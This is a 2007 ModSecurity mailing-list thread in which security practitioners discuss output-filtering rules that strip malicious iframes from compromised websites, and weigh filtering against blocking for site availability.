[Modsecurity] iframe filtering rules

Michael Shinn mike at gotroot.com
Sat Sep 8 16:10:20 EDT 2007 

Ryan Barnett wrote:
> One question for Michael - why just silently remove the malicious
> iframe?  Wouldn't it be better to implement these RegExs into
> ModSecurity rules that monitor outbound traffic and then block and alert
> in such situations?

As you know, better ultimately depends on whats important to the site
owner (I mean, how many people still share default passwords for
critical systems because its "easier"?)  :-)

Whereas, I certainly don't see logging/alerting as mutually exclusive to
filtering out the content, blocking and filtering do have very different
outcomes for a site so in some cases blocking may not be better.
Blocking is certainly more reliable and secure (what if you miss
something in the filtering method?), whereas filtering prevents you from
carrying out an availability attack against your own security model -
you know your content still gets to your user, and if its can be
reasonably assured to be malicious-free, win-win.  Either case works to
varying levels of assurance, so I wouldn't say one is better a priori
than the other, they each have trade offs and serve different goals, but
in some cases one can be better than the other.

To that end, I'm going to be putting out OUTPUT rules that block
malicious content as well, but I've found that some sites can't use them
at all.  Blocking any of their own content is worse for them than
getting their users infected (Newspapers, Weather sites, Government
systems, etc.)

Ultimately, I think it depends on whats more important to each site
owner.  In some cases, yes blocking outright is going to be the best
answer, for others, blocking your own content for your users might be
worse than letting them get infected.  It might be more important to say
"Tornado Warning" and accept the risk that a trojan might get thru, than
risk someone not being able to pull up the Tornado Warning site.  :-)

In any case, its certainly important to know that you get infected which
you could do in parallel with stripping out the iframes, output
filtering I think has a special place for those cases where availability
is of critical importance to the site.

I'll take a look at mod_publisher next to see how it scales.  Thanks for
the tip Ryan.

>  
> -- 
> Ryan C. Barnett
> ModSecurity Community Manager
> Breach Security: Director of Application Security Training
> Web Application Security Consortium (WASC) Member
> CIS Apache Benchmark Project Lead
> SANS Instructor, GCIA, GCFA, GCIH, GSNA, GCUX, GSEC
> Author: Preventing Web Attacks with Apache
> 
>  
> On 9/8/07, *Michael Shinn* <mike at gotroot.com <mailto:mike at gotroot.com>>
> wrote:
> 
>     Steve West wrote:
>     > Hi Michael,
>     >
>     > Thank you for the great tool! We've had a few customers web sites
>     have
>     > their web pages altered by hackers to add iframe tags, etc. The
>     > customers gave out their ftp credentials to the wrong ppl so we can't
>     > always protect against that. But I do have a few questions:
>     >
>     > 1. Is there any tool we can use if we are running apache 1.3.x?
> 
>     I'll look into.  I'm not positive if apache 1.x supports external
>     filters.  If it does, then it should be easy enough to put this
>     together
>     for 1.3.x too.  A quick look doesn't seem to show mod_ext_filter is
>     supported in 1.3.x, so I'll have to look for other options.
> 
>     > 2. You should also add some filtering for obfuscated javascript which
>     > I'm seeing some recent hacks employ to get around security
>     > countermeasures on the server side.
> 
>     Thanks for the suggestion.  I'll see what I can put together for that
>     too.  If you have some examples, please send them my way I'll see
>     what I
>     can put together this weekend.
> 
>     And for anyone wondering where the big update is, I'm almost finished
>     with it finally.  I'm just debugging a final problem with phase 2
>     transforms, which was stopping chained rules from working entirely.  So
>     many rules, so many dependencies...
> 
>     > thx,
>     >
>     > SW
>     >
>     >
>     > Michael Shinn wrote:
>     >> I put together a method for filtering out bad iframes from websites.
>     >> Output filtering, for websites that become infected.  You can
>     read on
>     >> for the details here:
>     >>
>     >> http://www.gotroot.com/tiki-read_article.php?articleId=278
>     >>
>     >> Rules update is in testing now, will be putting out a major overhaul
>     >> this week.  The major performance improvements will require
>     modsec 2.5.
>     >>
>     >>
>     >
> 
>     _______________________________________________
>     Modsecurity mailing list
>     Modsecurity at gotroot.com <mailto:Modsecurity at gotroot.com>
>     http://lists.gotroot.com/mailman/listinfo/modsecurity
>

More information about the Modsecurity mailing list